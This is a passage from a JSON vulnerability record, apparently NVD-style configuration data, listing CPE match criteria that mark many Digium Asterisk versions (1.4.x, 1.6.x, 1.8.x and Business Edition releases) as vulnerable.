              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "6071601F-CF37-4E66-9D6D-AFC3434C18AB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "2A575824-E005-4820-824A-4875594619E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "080C7089-5662-4A94-9842-C4A26095DA4B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7AE38697-0B16-4032-9234-CA263E4A9885",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24:*:*:*:*:*:*:*",
              "matchCriteriaId": "DCB18BE2-B073-429C-ABE7-B8305793DAE4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FA7216BA-A42F-4ED8-8086-B4FA483FDAB6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "CB7D2048-CD61-46C0-830B-11976B275783",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25:*:*:*:*:*:*:*",
              "matchCriteriaId": "8DBA63FE-62AF-4F3D-B30C-550D17C4E35F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "AD0A0F19-020D-4578-9023-12B0CB646D9C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "96D5A1E3-FF0B-4C71-AA51-655D7106880D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:*:*:*:*:*:*:*",
              "matchCriteriaId": "E5D425E6-E2E5-4452-9EAA-2697C1155784",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9855FA26-0930-4AC9-A920-B394F6916349",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BBA21246-7DF4-41BC-998A-05D38FC97C8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EE9A7984-22C9-4296-8E44-C010E67F193D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "51B2C42A-C252-4BD8-A908-8F30C2BF15E7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "2137CEAD-0F19-43C5-A26D-1972564FCD8C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "B7552466-B782-4F16-8561-A2A51E94FED4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C2F8C82D-3031-4C62-89FA-3BF56EA29727",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B3074CEA-46BD-4CAD-BF5C-10008A80E434",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6AB8988-FCC6-407A-A7D9-2F7A3A7488B1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:*:*:*:*:*:*:*",
              "matchCriteriaId": "E06848DE-6EE1-4FD0-A14F-39D41B2F3E75",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CF342950-FDD7-41A9-94D5-EDF41130B61E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6E4543AA-3D54-4444-AD1F-381A87A89DA2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "AF3036DD-261C-4975-A01E-92CD29479588",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "EF07C116-27DC-4875-9DCF-049E2A8EAEA4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "88FBC328-538A-4484-A342-1688D9669B9F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "CBF2301E-F6EF-4D28-82EE-FA1AB8CA9E43",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.28:*:*:*:*:*:*:*",
              "matchCriteriaId": "A53F637C-846A-43FC-BA71-C8571648FA46",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.28:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "E61070F4-1B6B-4814-918E-459DE5119A24",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.29:*:*:*:*:*:*:*",
              "matchCriteriaId": "70664E0F-09CF-42C2-A7A7-E635D022E90D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.29:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D1E13E1A-C2D4-4E5A-84C8-E6AF061D67C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.29.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7E811134-B657-4C50-9AEF-A7F68CA5577A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.30:*:*:*:*:*:*:*",
              "matchCriteriaId": "4C4CD101-F079-4940-AA79-886B69A7A514",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.30:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B7B828E9-5BE3-4E6F-8048-F2B1F2E929CC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.30:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "75BB2066-74A6-4F89-B54C-35F234DC1F03",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.31:*:*:*:*:*:*:*",
              "matchCriteriaId": "FE522334-BF53-4E34-949B-CD928B59A341",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.31:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "648DEC0E-3CBC-4EA2-AF27-2C518B0762CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.31:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B50F4BAE-D00D-4352-B52B-BE1A9FFB6949",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.32:*:*:*:*:*:*:*",
              "matchCriteriaId": "E7A35508-8235-4915-8810-12B2630C82C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.32:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "63DD4EE5-6F56-41C7-9CB4-16ADF4F63B8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33:*:*:*:*:*:*:*",
              "matchCriteriaId": "2347E451-2F89-4EA6-A6E0-22BCB0C8A56E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A86F5360-6FE4-4EA2-9208-076E78C842A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "3CDFA85B-17A4-4ECC-9922-F5546917B4C0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3D7D7DB7-32A7-490E-AED2-C404D371E7C2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.34:*:*:*:*:*:*:*",
              "matchCriteriaId": "A03632BC-CA0F-42BD-8839-A72DB146A4A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.34:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9DC4EF64-6A1D-47CB-AC07-48CABB612DCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.34:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "68C00FEF-7850-48F4-8122-4211D080B508",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.35:*:*:*:*:*:*:*",
              "matchCriteriaId": "D3A48F07-42E1-47E9-94EA-44D20A0BAC3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.35:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87D16470-5892-4289-BB35-B69100BCA31E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.36:*:*:*:*:*:*:*",
              "matchCriteriaId": "15E71BD7-83D1-4E2B-AD40-BB6B53056C89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.36:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87FDE2E2-5F08-43EF-BBD8-7DCCC0C98870",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.37:*:*:*:*:*:*:*",
              "matchCriteriaId": "347E9D8C-A372-41F2-AB48-FFCAB454C9C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.37:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "74F67E57-1DD0-4850-8D7E-7A9748BD106C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.38:*:*:*:*:*:*:*",
              "matchCriteriaId": "B208C056-B567-4BEE-A9B7-AEB394341D5D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.38:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A0C3A2D4-07A9-4D28-AC18-03523E9FF34A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6516E0F-9F60-4D20-88D3-B9CD8DC93062",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "22147B91-45A4-4834-AC8D-2DC17A706BEF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "677C10DE-46D8-4EF1-BF22-63F3AE37CBC2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "E299CE20-B02D-4519-AC46-BB64B1E3826A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40:*:*:*:*:*:*:*",
              "matchCriteriaId": "22FD16C3-7518-4208-8C0A-043C13C14A72",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "2461B6B9-2C93-4D84-A1EE-C07AD32A9540",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C8A4CE2D-FBAB-4C35-846A-5B95BBCAD6BF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "30FFB6F4-1BC7-4D4C-9C65-A66CF514E321",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F8B700A-FACB-4BC8-9DF2-972DC63D852B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "FFD31B9B-2F43-4637-BE56-47A807384BF3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "E6450D6B-C907-49E6-9788-E4029C09285F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "DDB0432E-024A-4C0C-87FF-448E513D2834",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "D6A6A343-FEA2-49E5-9858-455AE3B29470",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "D57B94E3-EA37-466C-ADC4-5180D4502FDD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc7:*:*:*:*:*:*",
              "matchCriteriaId": "64D35A89-6B21-4770-AA0F-424C5C91A254",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc8:*:*:*:*:*:*",
              "matchCriteriaId": "14817302-A34A-4980-B148-AEB4B3B49BE3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "61FDFA96-E62A-413B-9846-F51F1F7349EC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DA924386-49F6-4371-B975-B1473EEA12F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B74A1B99-8901-4690-B994-1DAD3EFA5ABB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4253C7DD-3588-4B35-B96D-C027133BE93F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "24AE11DB-16D3-42BF-BC64-E8982107D35B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "53841D77-926C-4362-BC85-BD8B6AC4391D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "F98FD6E6-EDE9-437D-B7C2-2DB65B73D230",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "4BA6CA77-D358-4623-8400-78EFC47ADB7C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B4E62DAB-45E0-4EAA-8E45-6D3757A679D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.15:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1355578C-B384-401A-9123-2789CBECAD0B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "3491F8DB-A162-4608-B5F9-5401FE058CEB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C52730A8-D96E-46C1-8905-1D78A93E9C84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C6E5CD17-B14A-4BDB-BA75-261344FF6F25",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "63C8DBF5-6992-4618-BD2D-56F1F98EAE3C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEED6C07-CFB7-44DC-9A41-9B6271942123",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0864DAF9-B7FA-4018-99F4-F2A7AA6FBBB0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "694B257B-E73B-4534-B316-87284FA45534",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "418FD91F-014E-4529-8D72-D3FB27788EEA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "D213EC93-0D4F-4BD9-9F13-9A9E705135EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E9D2091-B292-4D6E-A91F-58D24BD5A5E3",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F6344E43-E8AA-4340-B3A7-72F5D6A5D184",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "4C170C1C-909D-4439-91B5-DB1A9CD150C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "EE821BE5-B1D3-4854-A700-3A83E5F15724",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "149C57CA-0B4B-4220-87FC-432418D1C393",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "035595D5-BBEC-4D85-AD7A-A2C932D2BA70",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "6DAF5655-F09F-47F8-AFA6-4B95F77A57F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F8E001D8-0A7B-4FDD-88E3-E124ED32B81C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9D5CFFBD-785F-4417-A54A-F3565FD6E736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D30EF999-92D1-4B19-8E32-1E4B35DE4EA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "A67D156B-9C43-444F-ADEC-B21D99D1433C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "893EB152-6444-43DB-8714-9735354C873A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8447EE7-A834-41D7-9204-07BD3752870C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C04F2C9-5672-42F2-B664-A3EE4C954C29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "33465668-4C91-4619-960A-D26D77853E53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CAD08674-0B44-44EA-940B-6812E2D5077D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEE87710-A129-43AA-BA08-8001848975FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F582C6E-5DA0-4D72-A40E-66BDBC5CF2B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E7CEBB8-01B3-4A05-AFE8-37A143C9833E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "522733A7-E89E-4BFD-AC93-D6882636E880",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2FAC47DD-B613-43E4-B9BF-6120B81D9789",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "86D20CB5-60E8-405E-B387-CF80C7DA5E07",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "71AB5A01-5961-4053-9111-CF32C6473A00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "77D8E1DC-041F-4B87-AF9A-E0EC4D6A4BD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7CCCB892-30CE-4BEF-904E-5D957F94D0EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F156798F-F2EF-4366-B17E-03165AB437D5",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.0:beta7:business:*:*:*:*:*",
              "matchCriteriaId": "1C4E15BB-71AB-4936-9CA7-E844572A3953",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.0:beta8:business:*:*:*:*:*",
              "matchCriteriaId": "EE5823E1-5BFF-44E0-B8DD-4D994073DC1B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.6:-:business:*:*:*:*:*",
              "matchCriteriaId": "E6C147EF-0C39-4979-A4F6-C0BE288F083F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.6.1:-:business:*:*:*:*:*",
              "matchCriteriaId": "0C1A8352-DE70-4D4E-BC4D-8EABE5431646",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.6.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "615D7356-E9DD-4149-B1BE-D3C3475A8841",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.8.0:-:business:*:*:*:*:*",
              "matchCriteriaId": "0628E34F-1A60-416D-A29C-EA28E8CC2430",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.8.1:-:business:*:*:*:*:*",
              "matchCriteriaId": "5F54511A-A2A9-4038-9D7D-2283A6709DB8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.2.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "3FA908BA-BEF8-44A5-AC95-E7CF020D0C94",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.0:-:business:*:*:*:*:*",
              "matchCriteriaId": "78E8936C-033B-49E6-BB39-D5BBBC80EB55",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.1.0:-:business:*:*:*:*:*",
              "matchCriteriaId": "5D05D04F-CD6C-4A73-885C-306D7A5CC7C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.1.1:-:business:*:*:*:*:*",
              "matchCriteriaId": "3805B5F3-A4CD-469F-9F8A-A271A79A2B7C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.2.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "9FAEBE5E-378A-40DC-B2B9-31F6D1305BCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.2.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "617B3FE8-39E3-41C0-9348-9507DA43DE93",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.3.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "04AB4C82-71BB-49B7-B4F3-4E75EFB5F1A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.6.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "78B55176-E269-411B-974A-B5D2CE8E08C2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.6.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "9BCF12B0-4B8D-499D-B5DE-FB0CD9EEC3B4",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8FE4BCF-9AE7-4F41-BA84-E9537CC1EBE3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F25B0D15-7C09-4BBB-AC84-A1898F448DB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "F259057F-3720-45D8-91B4-70A11B759794",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "A106C460-4CE2-4AC3-B2FD-310F05507511",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "3E119FF9-2AD3-450D-8BBF-C6DD063246EA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "759221D5-FC37-446D-9628-233B8D0B9120",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F82D4812-0429-42D4-BD27-C76CB9E7C368",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8FE11D6-8C0A-450E-B6DA-3AFE04D82232",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.4:*:*:*:*:*:*:*",
